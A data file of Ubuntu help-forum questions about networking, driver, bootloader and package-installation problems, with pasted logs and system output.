400386	how to get my samsung galaxy ace to connect to adhoc network ?	so i 've been struggling with this thing for some time now . i tried to set up an access point on ubuntu 12.04 , so i am able to use wifi on my phone through my netbook . i rooted my phone , got it to see ad-hoc networks , but apparently after this came the trickiest part : to actually connect to it . it shows my network , but it says that it is open , although i definitely set a password . my pocketbook e-reader shows that it is password protected , but it does n't connect to it either . so it is set as following : ssid : trol-1015pem mode : ad-hoc band : automatic ipv4 : shared with other computers ipv6 : ignore wireless protection : wep 128-bit . any suggestions on what to change , either on my phone or in ubuntu ? i would be very grateful ! got a hotspot working on windows 7 starter ( after some time ) through connectify , but i still prefer it to work on ubuntu as well ( for obvious reasons ) .
400387	how to install kde on ubuntu ? i tried to install kubuntu , but installations failed 2 times	how to install kde on ubuntu ? i tried to install kubuntu , but installations failed 2 times . is there any way to use kde under default distribution of ubuntu ?
400393	ubuntu 13.10 networking does n't work - wired and wireless	i just built a computer from scratch and installed ubuntu 13.10 on it ( dual booted with win8 ) . it has a tp-link tl-wdn4800 dual band wireless pcie wireless card , which connects fine to my home network in windows . however , in ubuntu it can see all the wireless networks but when i try to connect ( using the network-manager gui ) , it fails to connect . i tailed the logs and get this : == > /var/log/kern.log < == jan 5 01:50:02 sam-ubuntu kernel : [ 1424.954780 ] wlan1 : authenticate with 28 : c6:8e:90:58 : b5 jan 5 01:50:02 sam-ubuntu kernel : [ 1424.964135 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 1/3 ) jan 5 01:50:02 sam-ubuntu kernel : [ 1425.165893 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 2/3 ) jan 5 01:50:02 sam-ubuntu kernel : [ 1425.370177 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 3/3 ) jan 5 01:50:03 sam-ubuntu kernel : [ 1425.574425 ] wlan1 : authentication with 28 : c6:8e:90:58 : b5 timed out jan 5 01:50:11 sam-ubuntu kernel : [ 1434.044035 ] wlan1 : authenticate with 28 : c6:8e:90:58 : b5 jan 5 01:50:11 sam-ubuntu kernel : [ 1434.053699 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 1/3 ) jan 5 01:50:11 sam-ubuntu kernel : [ 1434.255130 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 2/3 ) jan 5 01:50:11 sam-ubuntu kernel : [ 1434.459440 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 3/3 ) jan 5 01:50:12 sam-ubuntu kernel : [ 1434.663724 ] wlan1 : authentication with 28 : c6:8e:90:58 : b5 timed out jan 5 01:50:13 sam-ubuntu kernel : [ 1436.447284 ] wlan1 : authenticate with 28 : c6:8e:90:58 : b5 jan 5 01:50:13 sam-ubuntu kernel : [ 1436.459921 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 1/3 ) jan 5 01:50:14 sam-ubuntu kernel : [ 1436.662602 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 2/3 ) jan 5 01:50:14 sam-ubuntu kernel : [ 1436.866890 ] wlan1 : direct probe to 28 : c6:8e:90:58 : b5 ( try 3/3 ) jan 5 01:50:14 sam-ubuntu kernel : [ 1437.071173 ] wlan1 : authentication with 28 : c6:8e:90:58 : b5 timed out the strange thing is that the same thing happens even when i try to connect to a wired network , and also when i try to connect to an unsecured wifi network . the same issue was present when i tried from a ubuntu 12.04 live cd . i do n't think it 's a wireless card issue since it also affects wired networks . any ideas ? i 've pasted some info below , please let me know if there is anything else i should provide . many thanks ! lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( external gfx0 port b ) ( rev 02 ) 00:02.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( pci express gpp port b ) 00:09.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( pci express gpp port h ) 00:0a.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( external gfx1 port a ) 00:0b.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( nb-sb link ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 1 ) 00:15.2 pci bridge : advanced micro devices , inc. [ amd/ati ] sb900 pci to pci bridge ( pcie port 2 ) 00:16.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 0 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 5 01:00.0 vga compatible controller : nvidia corporation gk106 [ geforce gtx 660 ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gk106 hdmi audio controller ( rev a1 ) 02:00.0 usb controller : etron technology , inc. ej168 usb 3.0 host controller ( rev 01 ) 03:00.0 sata controller : marvell technology group ltd. 88se9172 sata 6gb/s controller ( rev 11 ) 04:00.0 network controller : qualcomm atheros ar93xx wireless network adapter ( rev 01 ) 05:0e.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev c0 ) 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) 07:00.0 usb controller : etron technology , inc. ej168 usb 3.0 host controller ( rev 01 ) 08:00.0 sata controller : marvell technology group ltd. 88se9172 sata 6gb/s controller ( rev 11 ) ifconfig eth0 link encap : ethernet hwaddr 94 : de:80 : a6 : df:3d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:112 errors:0 dropped:0 overruns:0 frame:0 tx packets:112 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8768 ( 8.7 kb ) tx bytes:8768 ( 8.7 kb ) wlan1 link encap : ethernet hwaddr c0:4a:00:14:5d : c5 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) iwconfig wlan1 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=30 dbm retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . lo no wireless extensions . sudo lshw -c network [ sudo ] password for sam : *-network description : wireless interface product : ar93xx wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan1 version : 01 serial : c0:4a:00:14:5d : c5 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.11.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:32 memory : fe500000-fe51ffff memory : fe520000-fe52ffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 06 serial : 94 : de:80 : a6 : df:3d size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:76 ioport : b000 ( size=256 ) memory : fe300000-fe300fff memory : da100000-da103fff
400396	ubuntu getting too long to shut down	i had a problem with grub after i downloaded windows 8 . i could n't access it anymore and so could n't access the ubuntu partition that was on my laptop . since i needed to restore the files on the ubuntu partition , i used a live usb to run ubuntu and access any partition . i could access my data and stored it in a hard drive . but i also needed to back up data that was in an other partition , so i started doing that . but because it was taking too much time , i interreptud the download by shutting down the computer ( using the command line shutdown now , for a reason i do n't know , i ca n't use the mouse with the live session , so i did everything with shortcuts and the command line ) now the computer did n't shutdown , i keep having that ubuntu screen waiting for it to shutdown , but it still hasn't.i have n't done anything since then . ( it 's like this about 7 hours now ... ) i 'm just worried that the sudden shut down has damaged the hard drive ... i would like to know what can i do now , to have my data safe in the hard drive , and start my computer again ?
400398	how to install pythoncard ?	i am currently running ubuntu 13.10.i want to download pythoncard for python2.7.6.i also have anaconda1.8.0.so whenever i start python in my terminator or terminal , it starts along with anaconda .
400400	ubuntu 12.04 -- - grub-efi-amd64-signed failed to install into /target/	i have hp pavillion 14-n009tu laptop ( i-5 , 4gb ) with windows-8 os installed on it . i am trying to install ubuntu 12.04 as a dual boot os on windows8 . i have disabled fast boot and secure boot options also . i am facing following error while installing ubuntu 12.04 : grub-efi-amd64-signed failed to install into /target/ . without grub boot loader , the installed system will not boot i have created three partitions ( 1 ) 38gb-ext4- root mounted ( 2 ) 08gb-ext4- /home ( 3 ) 10gb swap area please guide me how to resolve this problem
400401	netflix on ubuntu	so i installed netflix desktop , but that does n't seem to work . when trying to play a video , it says i should install silverlight . i installed it from that link , but it was version 5 . when i checked the instructions later , it said that it should be version 4 . i tried to delete version 5 and install version 4 , but that fails , saying that i should install the latest version . is there any way to work around this ? i tried netflixbmc , but i could n't get that to work either . all information seems to be outdated . i tried installing the chrome launcher add-on , but it says there are dependencies missing . what is up with that ?
400403	how can i move files deleted from windows from ubuntu shared folder to trash ?	i am using ubuntu 13.10 and have shared a folder using in-built shared folder on ubuntu . when i delete a file from windows , the file is permanently deleted on ubuntu share . i want to achieve the following . delete file from windows and the files goes to a trash folder . this trash folder can then be cleaned manually . i have tried to configure the smb.conf file as follows , however the samba gui returns an error for recycle parameters shown below . [ sharedfolder ] path = /home/user/sharedfolder public = yes writable = yes browsable = yes vfs object = recycle **recycle : repository = .deleted recycle : keeptree = yes recycle : touch = yes recycle : versions = yes recycle : maxsixe = 0 recycle : exclude = *.tmp recycle : exclude_dir = /tmp recycle : noversions = *.doc**
400405	sluggish ui/video performance on nvidia geforce 8600 gs and very high cpu usage	i am a newbie in linux and installed ubuntu in my really old laptop dell vostro 1500 . everything seems to be working fine except the graphics driver . initially , i did n't understand that linux is using the default driver as all colours were looking good however the ui looks very slow and sluggish . moving window or any new popup comes up so late . system configuration : intel centrino 1.7ghz dual-core 3 gb ram 320 gb hdd nvidia geforce 8600 gs ubuntu 13.10 firstly i tried to install with the latest ubuntu provided nvidia driver , but it did n't work and caused x-server to crash . i used sudo apt-get install nvidia-latest . also tried installing the recommended driver from device manager , that did n't work either . i ended up with 640x480 resolution . after lots of googling , i came up with unofficial nvidia drivers from x-swat which seems to fix my resolution and a loaded nvidia driver . i used the command below sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install nvidia-current sudo nvidia-xconfig i have also checked if nvidia is loaded using lsmod | egrep `` nvidia '' which resulted nvidia 10304704 44 i have also checked the driver version from nvidia x server settings from start menu which resulted 304.117 i have also black-listed the following in /etc/modprobe.d/blacklist.conf blacklist intel_agp blacklist nouveau blacklist lbm-nouveau i have also tried to tweak nvidia settings with these following commands : nvidia-settings -a initialpixmapplacement=2 -a glyphcache=1 and also added : option `` pixmapcachesize '' `` 300000 '' option `` ondemandvblankinterrupts '' `` true '' to my xorg.conf device section . still , everything is slow , resizing/moving windows , scrolling , and also deserves mentioning video playback is extremely choppy . it would be lovely to have a response from linux gurus : )
400407	how to download spe ?	how to download spe in ubuntu 13.10.i have python2.7.6 in anaconda 1.8.0.i need it for making programs
400410	ubuntuone : sync to server without storing on disk first	duplicity ( déjà dup ) seems to be able to do backups on ubuntu one without storing the backup files locally . i would like to know , how would one achieve to upload a file to ubuntu one from a shell script without storing it on the hard disk fist ? in other words : the shell script should create a folder on ubuntu one , and copy a file directly to that directory on the server .
400411	how to call a function written in octave from c code	i have written a simple function in octave . this function add two numbers function [ z ] = addition ( x , y ) z=x+y ; end name of this function is addition i have made m file for this function addition.m please tell me how i can call this function from a c code
400412	why ca n't i execute libreoffice ?	i 'm a newbie in ubuntu and i 'm using ubuntu 13.10 . this week i 've removed libreoffice packages ( using synaptic ) from my system because i understand that an upgrade of libreoffice would fix a bug which wo n't let me use keyboard shortcuts while in foreign layout . after removing all my packages containing term 'libreoffice ' i 've downloaded the last version of libreoffice 4.1.4 , ( from libreoffice site ) unzipped it with archive manager and then typed the command sudo dpkg -i *.deb in deb folder . the installations seems to stop in the middle without putting any icons on my unity launcher i typed in terminal `` libreoffice4.1 '' but it did not execute . this msg error appeared : the application can not be started . [ context= '' shared '' ] caught unexpected com.sun.star.ucb.interactiveaugmentedioexception : > a folder could not be created below are the results of the output after entering sudo dpkg -i *.deb : appreciate your help selecting previously unselected package libobasis4.1-base . ( reading database ... 1086109 files and directories currently installed . ) unpacking libobasis4.1-base ( from libobasis4.1-base_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-calc . unpacking libobasis4.1-calc ( from libobasis4.1-calc_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-core01 . unpacking libobasis4.1-core01 ( from libobasis4.1-core01_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-core02 . unpacking libobasis4.1-core02 ( from libobasis4.1-core02_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-core03 . unpacking libobasis4.1-core03 ( from libobasis4.1-core03_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-core04 . unpacking libobasis4.1-core04 ( from libobasis4.1-core04_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-core05 . unpacking libobasis4.1-core05 ( from libobasis4.1-core05_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-core06 . unpacking libobasis4.1-core06 ( from libobasis4.1-core06_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-core07 . unpacking libobasis4.1-core07 ( from libobasis4.1-core07_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-draw . unpacking libobasis4.1-draw ( from libobasis4.1-draw_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-en-us . unpacking libobasis4.1-en-us ( from libobasis4.1-en-us_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-en-us-base . unpacking libobasis4.1-en-us-base ( from libobasis4.1-en-us-base_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-en-us-calc . unpacking libobasis4.1-en-us-calc ( from libobasis4.1-en-us-calc_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-en-us-math . unpacking libobasis4.1-en-us-math ( from libobasis4.1-en-us-math_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-en-us-res . unpacking libobasis4.1-en-us-res ( from libobasis4.1-en-us-res_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-en-us-writer . unpacking libobasis4.1-en-us-writer ( from libobasis4.1-en-us-writer_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-extension-beanshell-script-provider . unpacking libobasis4.1-extension-beanshell-script-provider ( from libobasis4.1-extension- beanshell-script-provider_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-extension-javascript-script- provider . unpacking libobasis4.1-extension-javascript-script-provider ( from libobasis4.1-extension- javascript-script-provider_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-extension-mediawiki-publisher . unpacking libobasis4.1-extension-mediawiki-publisher ( from libobasis4.1-extension- mediawiki-publisher_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-extension-nlpsolver . unpacking libobasis4.1-extension-nlpsolver ( from libobasis4.1-extension- nlpsolver_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-extension-pdf-import . unpacking libobasis4.1-extension-pdf-import ( from libobasis4.1-extension- pdf-import_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-extension-presentation-minimizer . unpacking libobasis4.1-extension-presentation-minimizer ( from libobasis4.1-extension- presentation-minimizer_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-extension-report-builder . unpacking libobasis4.1-extension-report-builder ( from libobasis4.1-extension-report- builder_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-gnome-integration . unpacking libobasis4.1-gnome-integration ( from libobasis4.1-gnome- integration_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-graphicfilter . unpacking libobasis4.1-graphicfilter ( from libobasis4.1- graphicfilter_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-images . unpacking libobasis4.1-images ( from libobasis4.1-images_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-impress . unpacking libobasis4.1-impress ( from libobasis4.1-impress_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-kde-integration . unpacking libobasis4.1-kde-integration ( from libobasis4.1- kde-integration_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-librelogo . unpacking libobasis4.1-librelogo ( from libobasis4.1-librelogo_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-math . unpacking libobasis4.1-math ( from libobasis4.1-math_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-ogltrans . unpacking libobasis4.1-ogltrans ( from libobasis4.1-ogltrans_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-onlineupdate . unpacking libobasis4.1-onlineupdate ( from libobasis4.1-onlineupdate_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-ooofonts . unpacking libobasis4.1-ooofonts ( from libobasis4.1-ooofonts_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-ooolinguistic . unpacking libobasis4.1-ooolinguistic ( from libobasis4.1- ooolinguistic_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-postgresql-sdbc . unpacking libobasis4.1-postgresql-sdbc ( from libobasis4.1-postgresql- sdbc_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-python-script-provider . unpacking libobasis4.1-python-script-provider ( from libobasis4.1-python-script- provider_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-pyuno . unpacking libobasis4.1-pyuno ( from libobasis4.1-pyuno_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-writer . unpacking libobasis4.1-writer ( from libobasis4.1-writer_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libobasis4.1-xsltfilter . unpacking libobasis4.1-xsltfilter ( from libobasis4.1-xsltfilter_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1 . unpacking libreoffice4.1 ( from libreoffice4.1_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-base . unpacking libreoffice4.1-base ( from libreoffice4.1-base_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-calc . unpacking libreoffice4.1-calc ( from libreoffice4.1-calc_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-debian-menus . unpacking libreoffice4.1-debian-menus ( from libreoffice4.1-debian-menus_4.1.4-2_all.deb ) ... selecting previously unselected package libreoffice4.1-dict-en . unpacking libreoffice4.1-dict-en ( from libreoffice4.1-dict-en_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-dict-es . unpacking libreoffice4.1-dict-es ( from libreoffice4.1-dict-es_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-dict-fr . unpacking libreoffice4.1-dict-fr ( from libreoffice4.1-dict-fr_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-draw . unpacking libreoffice4.1-draw ( from libreoffice4.1-draw_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-en-us . unpacking libreoffice4.1-en-us ( from libreoffice4.1-en-us_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-impress . unpacking libreoffice4.1-impress ( from libreoffice4.1-impress_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-math . unpacking libreoffice4.1-math ( from libreoffice4.1-math_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-ure . unpacking libreoffice4.1-ure ( from libreoffice4.1-ure_4.1.4.2-2_i386.deb ) ... selecting previously unselected package libreoffice4.1-writer . unpacking libreoffice4.1-writer ( from libreoffice4.1-writer_4.1.4.2-2_i386.deb ) ... setting up libreoffice4.1-debian-menus ( 4.1.4-2 ) ... /usr/bin/gtk-update-icon-cache gtk-update-icon-cache : cache file created successfully . /usr/bin/gtk-update-icon-cache gtk-update-icon-cache : cache file created successfully . setting up libreoffice4.1-ure ( 4.1.4.2-2 ) ... setting up libobasis4.1-core01 ( 4.1.4.2-2 ) ... setting up libobasis4.1-core02 ( 4.1.4.2-2 ) ... setting up libobasis4.1-core03 ( 4.1.4.2-2 ) ... setting up libobasis4.1-core04 ( 4.1.4.2-2 ) ... setting up libobasis4.1-core05 ( 4.1.4.2-2 ) ... setting up libobasis4.1-core06 ( 4.1.4.2-2 ) ... setting up libobasis4.1-core07 ( 4.1.4.2-2 ) ... setting up libobasis4.1-draw ( 4.1.4.2-2 ) ... setting up libobasis4.1-en-us ( 4.1.4.2-2 ) ... setting up libobasis4.1-en-us-base ( 4.1.4.2-2 ) ... setting up libobasis4.1-en-us-calc ( 4.1.4.2-2 ) ... setting up libobasis4.1-en-us-math ( 4.1.4.2-2 ) ... setting up libobasis4.1-en-us-res ( 4.1.4.2-2 ) ... setting up libobasis4.1-en-us-writer ( 4.1.4.2-2 ) ... setting up libobasis4.1-extension-beanshell-script-provider ( 4.1.4.2-2 ) ... setting up libobasis4.1-extension-javascript-script-provider ( 4.1.4.2-2 ) ... setting up libobasis4.1-extension-mediawiki-publisher ( 4.1.4.2-2 ) ... setting up libobasis4.1-extension-nlpsolver ( 4.1.4.2-2 ) ... setting up libobasis4.1-extension-pdf-import ( 4.1.4.2-2 ) ... setting up libobasis4.1-extension-presentation-minimizer ( 4.1.4.2-2 ) ... setting up libobasis4.1-extension-report-builder ( 4.1.4.2-2 ) ... setting up libobasis4.1-gnome-integration ( 4.1.4.2-2 ) ... setting up libobasis4.1-graphicfilter ( 4.1.4.2-2 ) ... setting up libobasis4.1-images ( 4.1.4.2-2 ) ... setting up libobasis4.1-impress ( 4.1.4.2-2 ) ... setting up libobasis4.1-kde-integration ( 4.1.4.2-2 ) ... setting up libobasis4.1-math ( 4.1.4.2-2 ) ... setting up libobasis4.1-ogltrans ( 4.1.4.2-2 ) ... setting up libobasis4.1-onlineupdate ( 4.1.4.2-2 ) ... setting up libobasis4.1-ooofonts ( 4.1.4.2-2 ) ... setting up libobasis4.1-ooolinguistic ( 4.1.4.2-2 ) ... setting up libobasis4.1-python-script-provider ( 4.1.4.2-2 ) ... setting up libobasis4.1-pyuno ( 4.1.4.2-2 ) ... setting up libobasis4.1-writer ( 4.1.4.2-2 ) ... setting up libobasis4.1-xsltfilter ( 4.1.4.2-2 ) ... setting up libreoffice4.1 ( 4.1.4.2-2 ) ... setting up libreoffice4.1-dict-en ( 4.1.4.2-2 ) ... setting up libreoffice4.1-dict-es ( 4.1.4.2-2 ) ... setting up libreoffice4.1-dict-fr ( 4.1.4.2-2 ) ... setting up libreoffice4.1-draw ( 4.1.4.2-2 ) ... setting up libreoffice4.1-en-us ( 4.1.4.2-2 ) ... setting up libreoffice4.1-impress ( 4.1.4.2-2 ) ... setting up libreoffice4.1-math ( 4.1.4.2-2 ) ... setting up libreoffice4.1-writer ( 4.1.4.2-2 ) ... setting up libobasis4.1-base ( 4.1.4.2-2 ) ... setting up libobasis4.1-calc ( 4.1.4.2-2 ) ... setting up libobasis4.1-librelogo ( 4.1.4.2-2 ) ... setting up libobasis4.1-postgresql-sdbc ( 4.1.4.2-2 ) ... setting up libreoffice4.1-base ( 4.1.4.2-2 ) ... setting up libreoffice4.1-calc ( 4.1.4.2-2 ) ... processing triggers for gnome-menus ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ... processing triggers for shared-mime-info ... processing triggers for gnome-icon-theme ... processing triggers for hicolor-icon-theme ...
400413	can i delete the .iso file after installing ubuntu ?	i 've been using ubuntu 12.10 alongside windows 8 and i installed it a long time back using a .iso file which is roughly 800mb in size . can i delete it now ? will it affect my pc ? can i do the same for 13.10 ? thanks in advance .
400417	sudo command not found ( su login not working )	i had a system crash and now my ubuntu runs into low-graphics mode . all the fixes require running commands with sudo . when i try this i get sudo : command not found . when i try logging in with su - i get an error : authentication failed . i also tried sudo -i but that did nothing . i am really stuck here . what can i do ? relevant info : $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/bin : /usr/sbin : /sbin : /bin $ ls -l /usr/bin/sudo -rwsr-xr-x 1 root root 121144 feb 28 2013 /usr/bin/sudo -a sudo output : -bash : -a command not found which - a sudo output : /usr/bin/sudo echo foo output : permission denied
400418	how to download pygame in anaconda	i have anaconda 1.8.0.how can i download pygame in it.i am currently running ubuntu13.10.i have python 2.7.6 .
400422	error while installing tomcat6	i have installed eclipse 3.8 and want to configure tomcat6 as a web server but while installing it using command sudo apt-get install tomcat6 i am getting following error msg at the prompt : root @ chapucabra-hp-1000-notebook-pc : ~ # sudo apt-get install tomcat6 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : tomcat6 : depends : tomcat6-common ( > = 6.0.37-1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . root @ chapucabra-hp-1000-notebook-pc : ~ # also , tomcat7 is getting installed successfully but it does n't match with the eclipse version .
400428	problem with loading ubuntu 12.04 aftrer reinstalling windows 7	i installed windows 7 . i installed ubuntu 12.04 with wubi.exe and after i reinstalled widows 7 i could n't load ubuntu . i downloaded and installed `` easybcd 2.2 '' and made new entry with `` type : grub 2 ; '' and `` drive : automatically locate and load '' and after restart when chose ubuntu i saw black screen waiting for command with text `` grub > `` how to fix it to show me normal ubuntu 12.04 screen ? thanks ! i tried and with wubi in easybcd and it was the same ...
400431	ubuntu 13.10 or 13.04 or 12.04 ?	i have used ubuntu 13.10 for last month . i enjoyed using it , but it was very buggy and unstable . every now and then i experienced random freezes , mishappens and various other bugs . because of this reason , i installed ubuntu 12.04 just now . even though i know , that 12.04 should be more stable , i miss various new features , one of them is unity tweak tool support . i would like to ask you about 13.04 . is it stable ? personally , i use computer for the following : browsing the internet writing various documents reading studying in general watching films / listening to music ( spotify ) programming in c++ , java ( android ) , and java in general flashing custom android roms to my phone i would like to experience the good side of linux : stability , performance , customizability . i liked 13.10 because of customizability options , but stability was a dog . which one , if you were me , would you choose and why ? thank you for your tips . edit : also i would like to ask about 14.04 . i have heard that it is much more stable then 13.10 : )
400433	introducing a new keyboard layout	how and where can i ask introducing of a new keyboard layout ( ideally for linux generally ) ? i have created an own layout for czech with support for esperanto ( the default ubuntu option `` add esperanto characters ( supersigno ) '' leads to some problems for removing some useful signs from the czech keyboard ) and i think it would be useful for the other users as well .
